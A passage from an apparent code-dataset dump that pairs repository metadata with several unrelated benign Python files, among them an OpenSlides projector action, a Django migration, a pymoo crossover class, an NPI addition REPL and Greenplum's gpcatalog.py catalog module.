] | 5 | 2020-01-20T13:57:15.000Z | 2021-03-27T14:14:44.000Z | openslides_backend/action/actions/projector/control_view.py | MJJojo97/openslides-backend | af0d1edb0070e352d46f285a1ba0bbe3702d49ae | [
"MIT"
] | 859 | 2020-01-11T22:58:37.000Z | 2022-03-30T14:54:06.000Z | openslides_backend/action/actions/projector/control_view.py | MJJojo97/openslides-backend | af0d1edb0070e352d46f285a1ba0bbe3702d49ae | [
"MIT"
] | 16 | 2020-01-04T20:28:57.000Z | 2022-02-10T12:06:54.000Z | from typing import Any, Dict
from ....models.models import Projector
from ....permissions.permissions import Permissions
from ....shared.exceptions import ActionException
from ....shared.patterns import FullQualifiedId
from ...generics.update import UpdateAction
from ...util.default_schema import DefaultSchema
from ...util.register import register_action
@register_action("projector.control_view")
class ProjectorControlView(UpdateAction):
"""
Action to control view a projector.
"""
model = Projector()
schema = DefaultSchema(Projector()).get_update_schema(
additional_required_fields={
"field": {"type": "string", "enum": ["scale", "scroll"]},
"direction": {"type": "string", "enum": ["up", "down", "reset"]},
},
additional_optional_fields={
"step": {"type": "integer", "minimum": 1},
},
)
permission = Permissions.Projector.CAN_MANAGE
def update_instance(self, instance: Dict[str, Any]) -> Dict[str, Any]:
field = instance.pop("field")
direction = instance.pop("direction")
step = instance.pop("step", 1)
if direction == "reset":
new_value = 0
elif direction == "up":
projector = self.datastore.get(
FullQualifiedId(self.model.collection, instance["id"]), [field]
)
new_value = projector.get(field, 0) + step
elif direction == "down":
projector = self.datastore.get(
FullQualifiedId(self.model.collection, instance["id"]), [field]
)
new_value = projector.get(field, 0) - step
else:
raise ActionException(f"Unknown direction {direction}")
instance[field] = new_value
return instance
| 34.5 | 79 | 0.615942 |
795ac4e369cfecef8785479f392f1166a05cef53 | 1,293 | py | Python | Question_duplicate_number/python/main.py | josue-lubaki/awesome-interview | 6583e04ec25ebfd7a6647d7f7803c37d75852dee | [
"MIT"
] | 1 | 2022-01-11T23:44:56.000Z | 2022-01-11T23:44:56.000Z | Question_duplicate_number/python/main.py | josue-lubaki/awesome-interview | 6583e04ec25ebfd7a6647d7f7803c37d75852dee | [
"MIT"
] | null | null | null | Question_duplicate_number/python/main.py | josue-lubaki/awesome-interview | 6583e04ec25ebfd7a6647d7f7803c37d75852dee | [
"MIT"
] | null | null | null | """
function 1 : find_duplicate_by_josueLubaki
@param arr : list of numbers
@return list of integers
@author : Josue Lubaki
"""
def find_duplicate_by_josueLubaki(arr):
duplicates, seen = set(), set()
for element in arr:
if element in seen:
duplicates.add(element)
seen.add(element)
return duplicates
"""
function 2 : find_duplicate_number_by_josueLubaki
@param arr : list of numbers
@return list of integers
@author : Josue Lubaki
"""
def find_duplicate_number_by_josueLubaki(arr):
duplicates = set()
for i in range(len(arr)):
if arr[i] in arr[i + 1 :]:
duplicates.add(arr[i])
return duplicates
"""
function 3 : find_duplicate_number
@param arr : list of numbers
@return list of integers
@author : Josue Lubaki
"""
def find_duplicate_integer_by_josueLubaki(arr):
duplicates = set()
for i in range(len(arr)):
if arr.index(arr[i]) != i:
duplicates.add(arr[i])
return duplicates
"""
function 4 : find_duplicate_number
@param arr : list of numbers
@return list of integers
@author : ???
"""
# WRITE YOUR CODE HERE
# Test
list = [1, 7, 3, 4, 5, 6, 7, 3, 4]
print(find_duplicate_integer_by_josueLubaki(list)) # [3, 4, 7]
| 23.089286 | 63 | 0.634957 |
795ac531224f0a92bfad5fb9d19b642e1d38ad65 | 3,869 | py | Python | subjects/migrations/0001_initial.py | soumith2105/vasv-stdin-backend | 72472af0f4a9ea5d9d51f980d148badbb9252fe6 | [
"MIT"
] | null | null | null | subjects/migrations/0001_initial.py | soumith2105/vasv-stdin-backend | 72472af0f4a9ea5d9d51f980d148badbb9252fe6 | [
"MIT"
] | 1 | 2022-02-21T15:09:06.000Z | 2022-02-21T15:09:06.000Z | subjects/migrations/0001_initial.py | soumith2105/vasv-stdin-backend | 72472af0f4a9ea5d9d51f980d148badbb9252fe6 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.2 on 2021-05-11 22:16
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
("semesters", "0001_initial"),
]
operations = [
migrations.CreateModel(
name="Subject",
fields=[
(
"id",
models.BigAutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(max_length=20)),
("full_name", models.CharField(blank=True, max_length=100, null=True)),
("lecturer", models.CharField(blank=True, max_length=150, null=True)),
("year", models.CharField(default="NA", max_length=15)),
("semester", models.IntegerField()),
("branch", models.CharField(default="IT", max_length=5)),
("section", models.CharField(blank=True, max_length=2)),
],
options={
"ordering": ["year", "semester", "branch", "section", "name"],
},
),
migrations.CreateModel(
name="SubjectBlock",
fields=[
(
"id",
models.BigAutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("total", models.IntegerField(default=0)),
("present", models.IntegerField(default=0)),
("absent", models.IntegerField(default=0)),
("int1_max", models.FloatField(default=0)),
("int1", models.FloatField(default=0)),
("int2_max", models.FloatField(default=0)),
("int2", models.FloatField(default=0)),
("assn1_max", models.FloatField(default=0)),
("assn1", models.FloatField(default=0)),
("assn2_max", models.FloatField(default=0)),
("assn2", models.FloatField(default=0)),
("assn3_max", models.FloatField(default=0)),
("assn3", models.FloatField(default=0)),
("quiz1_max", models.FloatField(default=0)),
("quiz1", models.FloatField(default=0)),
("quiz2_max", models.FloatField(default=0)),
("quiz2", models.FloatField(default=0)),
("quiz3_max", models.FloatField(default=0)),
("quiz3", models.FloatField(default=0)),
("sess_max", models.FloatField(default=0)),
("sess", models.FloatField(default=0)),
("ext_grade", models.CharField(default="NA", max_length=3)),
("ext_sub_credits", models.IntegerField(default=0)),
("ext_grade_pts", models.IntegerField(default=0)),
(
"semester",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="semesters.semester",
),
),
(
"subject",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="subjects.subject",
),
),
],
options={
"ordering": [
"-semester__semester",
"-semester__student__name",
"subject__name",
],
},
),
]
| 38.69 | 87 | 0.453089 |
795ac5c9fb2d3a9b12c78b7bc7151cd9528a08de | 139 | py | Python | pythran/tests/rosetta/generic_swap.py | davidbrochart/pythran | 24b6c8650fe99791a4091cbdc2c24686e86aa67c | [
"BSD-3-Clause"
] | 1,647 | 2015-01-13T01:45:38.000Z | 2022-03-28T01:23:41.000Z | pythran/tests/rosetta/generic_swap.py | davidbrochart/pythran | 24b6c8650fe99791a4091cbdc2c24686e86aa67c | [
"BSD-3-Clause"
] | 1,116 | 2015-01-01T09:52:05.000Z | 2022-03-18T21:06:40.000Z | pythran/tests/rosetta/generic_swap.py | davidbrochart/pythran | 24b6c8650fe99791a4091cbdc2c24686e86aa67c | [
"BSD-3-Clause"
] | 180 | 2015-02-12T02:47:28.000Z | 2022-03-14T10:28:18.000Z | #from http://rosettacode.org/wiki/Generic_swap#Python
#pythran export swap(str, int)
#runas swap("e", 15)
def swap(a, b):
return b, a
| 19.857143 | 53 | 0.690647 |
795ac681e50cc715b00a6b7d2863b45a519ae201 | 1,392 | py | Python | pymoo/model/crossover.py | Peng-YM/pymoo | f2931be04ce1a33d641172340efde519bedcf22d | [
"Apache-2.0"
] | 1 | 2020-11-18T10:04:02.000Z | 2020-11-18T10:04:02.000Z | pymoo/model/crossover.py | Peng-YM/pymoo | f2931be04ce1a33d641172340efde519bedcf22d | [
"Apache-2.0"
] | null | null | null | pymoo/model/crossover.py | Peng-YM/pymoo | f2931be04ce1a33d641172340efde519bedcf22d | [
"Apache-2.0"
] | null | null | null | import numpy as np
from pymoo.model.population import Population
class Crossover:
"""
The crossover combines parents to offsprings. Some crossover are problem specific and use additional information.
This class must be inherited from to provide a crossover method to an algorithm.
"""
def __init__(self, n_parents, n_offsprings, prob=0.9):
self.prob = prob
self.n_parents = n_parents
self.n_offsprings = n_offsprings
def do(self, problem, *args, **kwargs):
if type(args[0]) is Population:
pop, parents = args
else:
pop = Population.create(*args)
parents = np.array([np.arange(len(args))])
if self.n_parents != parents.shape[1]:
raise ValueError('Exception during crossover: Number of parents differs from defined at crossover.')
# get the design space matrix form the population and parents
X = pop.get("X")[parents.T].copy()
# now apply the crossover probability
do_crossover = np.random.random(len(parents)) < self.prob
# execute the crossover
_X = self._do(problem, X, **kwargs)
X[:, do_crossover, :] = _X[:, do_crossover, :]
# flatten the array to become a 2d-array
X = X.reshape(-1, X.shape[-1])
# create a population object
off = pop.new("X", X)
return off
| 30.933333 | 117 | 0.625718 |
795ac74994163cdda01bd367390e0e08f0e5eb2b | 4,514 | py | Python | tasks/addition/eval.py | souradeepta/Neural-Programmer-Interpreter | 98bfbb5bf867834fa772f47c2866e3f683930b03 | [
"MIT"
] | null | null | null | tasks/addition/eval.py | souradeepta/Neural-Programmer-Interpreter | 98bfbb5bf867834fa772f47c2866e3f683930b03 | [
"MIT"
] | 5 | 2020-01-28T23:01:43.000Z | 2022-02-10T00:23:52.000Z | tasks/addition/eval.py | souradeepta/Neural-Programmer-Interpreter | 98bfbb5bf867834fa772f47c2866e3f683930b03 | [
"MIT"
] | 1 | 2020-04-29T17:51:10.000Z | 2020-04-29T17:51:10.000Z | """
eval.py
Loads in an Addition NPI, and starts a REPL for interactive addition.
"""
from model.npi import NPI
from tasks.addition.addition import AdditionCore
from tasks.addition.env.config import CONFIG, get_args, PROGRAM_SET, ScratchPad
import numpy as np
import pickle
import tensorflow as tf
LOG_PATH = "tasks/addition/log/"
CKPT_PATH = "tasks/addition/log/model.ckpt"
TEST_PATH = "tasks/addition/data/test.pik"
MOVE_PID, WRITE_PID = 0, 1
W_PTRS = {0: "OUT", 1: "CARRY"}
PTRS = {0: "IN1_PTR", 1: "IN2_PTR", 2: "CARRY_PTR", 3: "OUT_PTR"}
R_L = {0: "LEFT", 1: "RIGHT"}
def evaluate_addition():
"""
Load NPI Model from Checkpoint, and initialize REPL, for interactive carry-addition.
"""
# Load Data
with open(TEST_PATH, 'rb') as f:
data = pickle.load(f)
# Initialize Addition Core
core = AdditionCore()
# Initialize NPI Model
npi = NPI(core, CONFIG, LOG_PATH)
with tf.Session() as sess:
# Restore from Checkpoint
saver = tf.train.Saver()
saver.restore(sess, CKPT_PATH)
# Run REPL
repl(sess, npi, data)
def repl(session, npi, data):
while True:
inpt = input('Enter Two Numbers, or Hit Enter for Random Pair: ')
if inpt == "":
x, y, _ = data[np.random.randint(len(data))]
else:
x, y = map(int, inpt.split())
# Reset NPI States
print ()
npi.reset_state()
# Setup Environment
scratch = ScratchPad(x, y)
prog_name, prog_id, arg, term = 'ADD', 2, [], False
cont = 'c'
while cont == 'c' or cont == 'C':
# Print Step Output
if prog_id == MOVE_PID:
a0, a1 = PTRS.get(arg[0], "OOPS!"), R_L[arg[1]]
a_str = "[%s, %s]" % (str(a0), str(a1))
elif prog_id == WRITE_PID:
a0, a1 = W_PTRS[arg[0]], arg[1]
a_str = "[%s, %s]" % (str(a0), str(a1))
else:
a_str = "[]"
print ('Step: %s, Arguments: %s, Terminate: %s' % (prog_name, a_str, str(term)))
print ('IN 1: %s, IN 2: %s, CARRY: %s, OUT: %s' % (scratch.in1_ptr[1],
scratch.in2_ptr[1],
scratch.carry_ptr[1],
scratch.out_ptr[1]))
# Update Environment if MOVE or WRITE
if prog_id == MOVE_PID or prog_id == WRITE_PID:
scratch.execute(prog_id, arg)
# Print Environment
scratch.pretty_print()
# Get Environment, Argument Vectors
env_in, arg_in, prog_in = [scratch.get_env()], [get_args(arg, arg_in=True)], [[prog_id]]
t, n_p, n_args = session.run([npi.terminate, npi.program_distribution, npi.arguments],
feed_dict={npi.env_in: env_in, npi.arg_in: arg_in,
npi.prg_in: prog_in})
if np.argmax(t) == 1:
print ('Step: %s, Arguments: %s, Terminate: %s' % (prog_name, a_str, str(True)))
print ('IN 1: %s, IN 2: %s, CARRY: %s, OUT: %s' % (scratch.in1_ptr[1],
scratch.in2_ptr[1],
scratch.carry_ptr[1],
scratch.out_ptr[1]))
# Update Environment if MOVE or WRITE
if prog_id == MOVE_PID or prog_id == WRITE_PID:
scratch.execute(prog_id, arg)
# Print Environment
scratch.pretty_print()
output = int("".join(map(str, map(int, scratch[3]))))
print ("Model Output: %s + %s = %s" % (str(x), str(y), str(output)))
print ("Correct Out : %s + %s = %s" % (str(x), str(y), str(x + y)))
print ("Correct!" if output == (x + y) else "Incorrect!")
break
else:
prog_id = np.argmax(n_p)
prog_name = PROGRAM_SET[prog_id][0]
if prog_id == MOVE_PID or prog_id == WRITE_PID:
arg = [np.argmax(n_args[0]), np.argmax(n_args[1])]
else:
arg = []
term = False
cont = 'c'
# cont = input('Continue? ') | 36.699187 | 100 | 0.480948 |
795ac7b8d87a2f9d24cf8cb68548e52cf905e8f1 | 452 | py | Python | lezione2/python/esempi_liste.py | FabLab-Western-Sicily/coding-class-scratch-python | 85f20e727c1cc3659f553de048ed0d462d7f11dd | [
"MIT"
] | 1 | 2020-11-04T11:15:08.000Z | 2020-11-04T11:15:08.000Z | lezione2/python/esempi_liste.py | FabLab-Western-Sicily/coding-class-scratch-python | 85f20e727c1cc3659f553de048ed0d462d7f11dd | [
"MIT"
] | null | null | null | lezione2/python/esempi_liste.py | FabLab-Western-Sicily/coding-class-scratch-python | 85f20e727c1cc3659f553de048ed0d462d7f11dd | [
"MIT"
] | null | null | null | lista_esempio = []
altra_lista = list()
lista_esempio = [1,2,3,4]
print(altra_lista)
print(lista_esempio)
print(lista_esempio[1])
print(lista_esempio[-1])
print(lista_esempio[:-1])
lista_esempio.append(7)
print(lista_esempio)
lista_esempio.insert(2, 1)
print(lista_esempio)
lista_esempio.pop()
print(lista_esempio)
lista_esempio.remove(2)
print(lista_esempio)
print(lista_esempio.count(1))
lista_esempio.reverse()
print(lista_esempio) | 12.216216 | 29 | 0.767699 |
795ac8a9699d3bcb8f999347705cd36e7f99b3f5 | 24,018 | py | Python | gpMgmt/bin/gppylib/gpcatalog.py | khuddlefish/gpdb | 2d20bae838c5ed433eecf6ecceca1b8dd5221197 | [
"PostgreSQL",
"Apache-2.0"
] | null | null | null | gpMgmt/bin/gppylib/gpcatalog.py | khuddlefish/gpdb | 2d20bae838c5ed433eecf6ecceca1b8dd5221197 | [
"PostgreSQL",
"Apache-2.0"
] | null | null | null | gpMgmt/bin/gppylib/gpcatalog.py | khuddlefish/gpdb | 2d20bae838c5ed433eecf6ecceca1b8dd5221197 | [
"PostgreSQL",
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
# Copyright (c) 2010-2011 EMC Corporation. All Rights Reserved
#
"""
gpcatalog.py
Contains two classes representing catalog metadata:
Catalog - a container class for CatalogTables
CatalogTable - metadata about a single tables
"""
# ============================================================================
import os
import json
from gppylib import gplog
from gppylib.gpversion import GpVersion
logger = gplog.get_default_logger()
class GPCatalogException(Exception):
pass
# Hard coded since "master only" is not defined in the catalog
MASTER_ONLY_TABLES = [
'gp_segment_configuration',
'gp_configuration_history',
'gp_distribution_policy',
'gp_segment_configuration',
'pg_description',
'pg_listener', # ???
'pg_partition',
'pg_partition_rule',
'pg_shdescription',
'pg_stat_last_operation',
'pg_stat_last_shoperation',
'pg_statistic',
'pg_filespace_entry',
'pg_partition_encoding',
'pg_auth_time_constraint',
]
# Hard coded since "persistent" is not defined in the catalog
PERSISTENT_TABLES = [
'gp_global_sequence',
'gp_persistent_database_node',
'gp_persistent_filespace_node',
'gp_persistent_relation_node',
'gp_persistent_tablespace_node',
'gp_relation_node',
]
# Hard coded tables that have different values on every segment
SEGMENT_LOCAL_TABLES = [
'gp_id',
'pg_shdepend', # (not if we fix oid inconsistencies)
'gp_fastsequence', # AO segment row id allocations
'pg_statistic',
]
# These catalog tables either do not use pg_depend or does not create an
# entry in pg_depend immediately when an entry is created in that
# catalog table
DEPENDENCY_EXCLUSION = [
'pg_authid',
'pg_compression',
'pg_conversion',
'pg_database',
'pg_enum',
'pg_filespace',
'pg_namespace',
'pg_partition',
'pg_partition_rule',
'pg_resgroup',
'pg_resgroupcapability',
'pg_resourcetype',
'pg_resqueue',
'pg_resqueuecapability',
'pg_tablespace'
]
# ============================================================================
class GPCatalog():
"""
Catalog is a container class that contains dictionary of CatalogTable
objects.
It provides the CatalogTables with a context that they can use to
refer to other CatalogTables (e.g. describe foreign keys) and it
provides calling code with a simple wrapper for what a known catalog
layout looks like.
It supports multiple source versions of the database. It issues a
warning if there are catalog tables defined in the database that
it is unaware of, usually indicating that it is operating against
an unknown version.
"""
# --------------------------------------------------------------------
# Public API functions:
# - Catalog() - Create a Catalog object
# - getCatalogTable() - Returns a single CatalogTable
# - getCatalogTables() - Returns a list of CatalogTable
# - getCatalogVersion() - Returns a GpVersion
# --------------------------------------------------------------------
def getCatalogTable(self, tablename):
"""
getCatalogTable(tablename) => Returns the specified CatalogTable
Raises: CatalogException when the table does not exist
"""
if tablename not in self._tables:
raise GPCatalogException("No such catalog table: %s" % str(tablename))
return self._tables[tablename]
def getCatalogTables(self):
"""
getCatalogTables() => Returns a list of CatalogTable
"""
return self._tables.values()
def getCatalogVersion(self):
"""
getCatalogVersion() => Returns the GpVersion object
"""
return self._version
# --------------------------------------------------------------------
# Private implementation functions:
# --------------------------------------------------------------------
def __init__(self, dbConnection):
"""
Catalog() constructor
1) Uses the supplied database connection to get a list of catalog tables
2) iterate through the list building up CatalogTable objects
3) Mark "master only" tables manually
4) Mark a couple primary keys manually
5) Mark foreign keys manually
6) Mark known catalog differences manually
7) Validate and return the Catalog object
"""
self._dbConnection = dbConnection
self._tables = {}
self._version = None
self._tidycat = {} # tidycat definitions from JSON file
version_query = """
SELECT version()
"""
catalog_query = """
SELECT relname, relisshared FROM pg_class
WHERE relnamespace=11 and relkind = 'r'
"""
# Read the catalog version from the database
try:
curs = self._query(version_query)
except Exception, e:
raise GPCatalogException("Error reading database version: " + str(e))
self._version = GpVersion(curs.getresult()[0][0])
# Read the list of catalog tables from the database
try:
curs = self._query(catalog_query)
except Exception, e:
raise GPCatalogException("Error reading catalog: " + str(e))
# Construct our internal representation of the catalog
for [relname, relisshared] in curs.getresult():
self._tables[relname] = GPCatalogTable(self, relname)
# Note: stupid API returns t/f for boolean value
self._tables[relname]._setShared(relisshared is 't')
# The tidycat.pl utility has been used to generate a json file
# describing aspects of the catalog that we can not currently
# interrogate from the catalog itself. This includes things
# like which tables are master only vs segment local and what
# the foreign key relationships are.
self._getJson()
# Which tables are "master only" is not derivable from the catalog
# so we have to set this manually.
self._markMasterOnlyTables()
# We derived primary keys for most of the catalogs based on un
# unique indexes, but we have to manually set a few stranglers
self._setPrimaryKeys()
# Foreign key relationships of the catalog tables are not actually
# defined in the catalog, so must be obtained from tidycat
self._setForeignKeys()
# Most catalog tables are now ready to go, but some columns can
# not be compared directly between segments, we need to indicate
# these exceptions manually.
self._setKnownDifferences()
# Finally validate that everything looks right, this will issue
# warnings if there are any regular catalog tables that do not
# have primary keys set.
self._validate()
def _query(self, qry):
"""
Simple wrapper around querying the database connection
"""
return self._dbConnection.query(qry)
def _markMasterOnlyTables(self):
"""
We mark three types of catalog tables as "master only"
- True "master only" tables
- Tables we know to have different contents on master/segment
- Persistent Tables
While the later two are not technically "master only" they have
the property that we cannot validate cross segment consistency,
which makes them the same for our current purposes.
We may want to eventually move these other types of tables into
a different classification.
"""
for name in MASTER_ONLY_TABLES:
if name in self._tables:
self._tables[name]._setMasterOnly()
for name in SEGMENT_LOCAL_TABLES:
if name in self._tables:
self._tables[name]._setMasterOnly()
for name in PERSISTENT_TABLES:
if name in self._tables:
self._tables[name]._setMasterOnly()
def _setPrimaryKeys(self):
"""
Most of the catalog primary keys are set automatically in
CatalogTable by looking at unique indexes over the catalogs.
However there are a couple of catalog tables that do not have
unique indexes that we still want to perform cross segment
consistency on, for them we have to manually set a primary key
"""
self._tables['gp_version_at_initdb']._setPrimaryKey(
"schemaversion productversion")
self._tables['pg_constraint']._setPrimaryKey(
"conname connamespace conrelid contypid")
self._tables['pg_depend']._setPrimaryKey(
"classid objid objsubid refclassid refobjid refobjsubid deptype")
if self._version >= "4.0":
self._tables['pg_resqueuecapability']._setPrimaryKey(
"resqueueid restypid")
def _getJson(self):
"""
Read the json file generated by tidycat which contains, among other
things, the primary key/foreign key relationships for the catalog
tables. Build the fkeys for each table and validate them against
the catalog.
"""
indir = os.path.dirname(__file__)
jname = str(self._version.getVersionRelease()) + ".json"
try:
# json doc in data subdirectory of pylib module
infil = open(os.path.join(indir, "data", jname), "r")
d = json.load(infil)
# remove the tidycat comment
if "__comment" in d:
del d["__comment"]
if "__info" in d:
del d["__info"]
infil.close()
self._tidycat = d
except Exception, e:
# older versions of product will not have tidycat defs --
# need to handle this case
logger.warn("GPCatalogTable: "+ str(e))
def _setForeignKeys(self):
"""
Setup the foreign key relationships amongst the catalogs. We
drive this based on the tidycat generate json file since this
information is not derivable from the catalog.
"""
try:
for tname, tdef in self._tidycat.iteritems():
if "foreign_keys" not in tdef:
continue
for fkdef in tdef["foreign_keys"]:
fk2 = GPCatalogTableForeignKey(tname,
fkdef[0],
fkdef[1],
fkdef[2])
self._tables[tname]._addForeignKey(fk2)
except Exception, e:
# older versions of product will not have tidycat defs --
# need to handle this case
logger.warn("GPCatalogTable: "+ str(e))
def _setKnownDifferences(self):
"""
Some catalogs have columns that, for one reason or another, we
need to mark as being different between the segments and the master.
These fall into two catagories:
- Bugs (marked with the appropriate jiras)
- A small number of "special" columns
"""
# -------------
# Special cases
# -------------
# pg_class:
# - relfilenode should generally be consistent, but may not be (jira?)
# - relpages/reltuples/relfrozenxid are all vacumm/analyze related
# - relhasindex/relhaspkey are only cleared when vacuum completes
# - relowner has its own checks:
# => may want to separate out "owner" columns like acl and oid
self._tables['pg_class']._setKnownDifferences(
"relfilenode relpages reltuples relhasindex relhaspkey relowner relfrozenxid")
# pg_type: typowner has its own checks:
# => may want to separate out "owner" columns like acl and oid
self._tables['pg_type']._setKnownDifferences("typowner")
# pg_database: datfrozenxid = vacuum related
self._tables['pg_database']._setKnownDifferences("datfrozenxid")
# -------------
# Issues still present in the product
# -------------
# MPP-11289 : inconsistent OIDS for table "default values"
self._tables['pg_attrdef']._setKnownDifferences("oid")
# MPP-11284 : inconsistent OIDS for constraints
self._tables['pg_constraint']._setKnownDifferences("oid")
# MPP-11282: Inconsistent oids for language callback functions
# MPP-12015: Inconsistent oids for operator communtator/negator functions
self._tables['pg_proc']._setKnownDifferences("oid prolang")
# MPP-11282: pg_language oids and callback functions
self._tables['pg_language']._setKnownDifferences("oid lanplcallfoid lanvalidator")
# MPP-12015: Inconsistent oids for operator communtator/negator functions
# MPP-12015: Inconsistent oids for operator sort/cmp operators
self._tables['pg_operator']._setKnownDifferences(
"oid oprcom oprnegate oprlsortop oprrsortop oprltcmpop oprgtcmpop")
self._tables['pg_aggregate']._setKnownDifferences("aggsortop")
# MPP-11281 : Inconsistent oids for views
self._tables['pg_rewrite']._setKnownDifferences("oid ev_action")
# MPP-11285 : Inconsistent oids for triggers
self._tables['pg_trigger']._setKnownDifferences("oid")
# MPP-11575 : Inconsistent handling of indpred for partial indexes
# indcheckxmin column related to HOT feature in pg_index is calculated
# independently for master and segment based on individual nodes
# transaction state, hence it can be different so skip it from checks.
self._tables['pg_index']._setKnownDifferences("indpred, indcheckxmin")
# This section should have exceptions for tables for which OIDs are not
# synchronized between master and segments, refer function
# RelationNeedsSynchronizedOIDs() in catalog.c
self._tables['pg_amop']._setKnownDifferences("oid, amopopr")
self._tables['pg_amproc']._setKnownDifferences("oid");
def _validate(self):
"""
Check that all tables defined in the catalog have either been marked
as "master only" or have a primary key
"""
for relname in sorted(self._tables):
if self._tables[relname].isMasterOnly():
continue
if self._tables[relname].getPrimaryKey() == []:
logger.warn("GPCatalogTable: unable to derive primary key for %s"
% str(relname))
# ============================================================================
class GPCatalogTable():
# --------------------------------------------------------------------
# Public API functions:
#
# Accessor functions
# - getTableName() - Returns the table name (string)
# - tableHasOids() - Returns if the table has oids (boolean)
# - isMasterOnly() - Returns if the table is "master only" (boolean)
# - isShared() - Returns if the table is shared (boolean)
# - getTableAcl() - Returns name of the acl column (string|None)
# - getPrimaryKey() - Returns the primary key (list)
# - getForeignKeys() - Returns a list of foreign keys (list)
# - getTableColumns() - Returns a list of table columns (list)
#
# --------------------------------------------------------------------
def getTableName(self):
return self._name
def tableHasOids(self):
return self._has_oid
def tableHasConsistentOids(self):
return (self._has_oid and 'oid' not in self._excluding)
def isMasterOnly(self):
return self._master
def isShared(self):
return self._isshared
def getTableAcl(self):
return self._acl
def getPrimaryKey(self):
return self._pkey
def getForeignKeys(self):
return self._fkey
def getTableColtypes(self):
return self._coltypes
def getTableColumns(self, with_oid=True, with_acl=True, excluding=None):
'''
Returns the list of columns this catalog table contains.
Optionally excluding:
- oid columns
- acl columns
- user specified list of excluded columns
By default excludes the "known differences" columns, to include them
pass [] as the excluding list.
'''
if excluding == None:
excluding = self._excluding
else:
excluding = set(excluding)
# Return all columns that are not excluded
return [
x for x in self._columns
if ((with_oid or x != 'oid') and
(with_acl or x != self._acl) and
(x not in excluding))
]
# --------------------------------------------------------------------
# Private Implementation functions
# --------------------------------------------------------------------
def __init__(self, parent, name, pkey=None):
"""
Create a new GPCatalogTable object
Uses the supplied database connection to identify:
- What are the columns in the table?
- Does the catalog table have an oid column?
- Does the catalog table have an acl column?
"""
assert(name != None)
# Split string input
if isinstance(pkey, str):
pkey = pkey.split()
self._parent = parent
self._name = name
self._master = False
self._isshared = False
self._pkey = list(pkey or [])
self._fkey = [] # foreign key
self._excluding = set()
self._columns = [] # initial value
self._coltypes = {}
self._acl = None # initial value
self._has_oid = False # initial value
# Query the database to lookup the catalog's definition
qry = """
select a.attname, a.atttypid, t.typname
from pg_attribute a
left outer join pg_type t on (a.atttypid = t.oid)
where attrelid = 'pg_catalog.%s'::regclass and
(attnum > 0 or attname='oid')
order by attnum
""" % name
try:
cur = parent._query(qry)
except:
# The cast to regclass will fail if the catalog table doesn't
# exist.
raise GPCatalogException("Catalog table %s does not exist" % name)
if cur.ntuples() == 0:
raise GPCatalogException("Catalog table %s does not exist" % name)
for row in cur.getresult():
(attname, atttype, typname) = row
# Mark if the catalog has an oid column
if attname == 'oid':
self._has_oid = True
# Detect the presence of an ACL column
if atttype == 1034:
self._acl = attname
# Add to the list of columns
self._columns.append(attname)
# Add to the coltypes dictionary
self._coltypes[attname] = typname
# If a primary key was not specified try to locate a unique index
# If a table has mutiple matching indexes, we'll pick the first index
# order by indkey to avoid the issue of MPP-16663.
if self._pkey == []:
qry = """
SELECT attname FROM (
SELECT unnest(indkey) as keynum FROM (
SELECT indkey
FROM pg_index
WHERE indisunique and not (indkey @> '-2'::int2vector) and
indrelid = 'pg_catalog.{catname}'::regclass
ORDER BY indkey LIMIT 1
) index_keys
) unnested_index_keys
JOIN pg_attribute ON (attnum = keynum)
WHERE attrelid = 'pg_catalog.{catname}'::regclass
""".format(catname=name)
cur = parent._query(qry)
self._pkey = [row[0] for row in cur.getresult()]
# Primary key must be in the column list
for k in self._pkey:
if k not in self._columns:
raise GPCatalogException("%s.%s does not exist" % (name, k))
def __str__(self):
return self._name
def __hash__(self):
return hash(self.__str__())
def __repr__(self):
return "GPCatalogTable: %s; pkey: %s; oids: %s; acl: %s" % (
str(self._name), str(self._pkey), str(self._has_oid), str(self._acl),
)
def __cmp__(self, other):
return cmp(other, self._name)
def _setMasterOnly(self, value=True):
self._master = value
def _setShared(self, value):
self._isshared = value
def _setPrimaryKey(self, pkey=None):
# Split string input
if isinstance(pkey, str):
pkey = pkey.split()
# Check that the specified keys are real columns
pkey = list(pkey or [])
for k in pkey:
if k not in self._columns:
raise Exception("%s.%s does not exist" % (self._name, k))
self._pkey = pkey
def _addForeignKey(self, fkey):
# Check that the specified keys are real columns
for k in fkey.getColumns():
if k not in self._columns:
raise Exception("%s.%s does not exist" % (self._name, k))
self._fkey.append(fkey)
def _setKnownDifferences(self, diffs):
# Split string input
if isinstance(diffs, str):
diffs = diffs.split()
self._excluding = set(diffs or [])
# ============================================================================
class GPCatalogTableForeignKey():
"""
GPCatalogTableForeignKey is a container for a single instance of a
postgres catalog primary key/foreign key relationship. The
foreign key is a set of columns for with a table, associated with
a set of primary key columns on a primary key table.
Note that tables can self-join, so it is possible to have the
primary and foreign key tables be one and the same.
This class constructs the key, but does not validate it against
the catalog.
"""
# --------------------------------------------------------------------
# Public API functions:
#
# Accessor functions
# - getTableName() - Returns name of table with fkeys
# - getPkeyTableName() - Returns name of the pkey table for the fkeys
# - getColumns() - Returns a list of [foreign] key columns (list)
# - getPKey() - Returns a list of primary key columns (list)
#
# --------------------------------------------------------------------
def getTableName(self):
return self._tname
def getPkeyTableName(self):
return self._pktablename
def getColumns(self):
return self._columns
def getPKey(self):
return self._pkey
# --------------------------------------------------------------------
# Private Implementation functions
# --------------------------------------------------------------------
def __init__(self, tname, cols, pktablename, pkey):
"""
Create a new GPCatalogTableForeignKey object
"""
assert(tname != None)
assert(pktablename != None)
# Split string input
if isinstance(pkey, str):
pkey = pkey.split()
self._tname = tname
self._pktablename = pktablename
self._pkey = list(pkey or [])
self._columns = cols
def __str__(self):
return "%s: %s" % (self._tname, str(self._columns))
def __repr__(self):
return "GPCatalogTableForeignKey: %s; col: %s; " % (
str(self._tname), str(self._columns)
)
| 36.117293 | 90 | 0.580065 |
795ac90352d1861979d02d02ac3c159d626372a0 | 118 | py | Python | archive/examples/urwid_example.py | Tubular-Terriers/code-jam | be706c485110ee49727ec33d07b5d8fef7cf49e1 | [
"MIT"
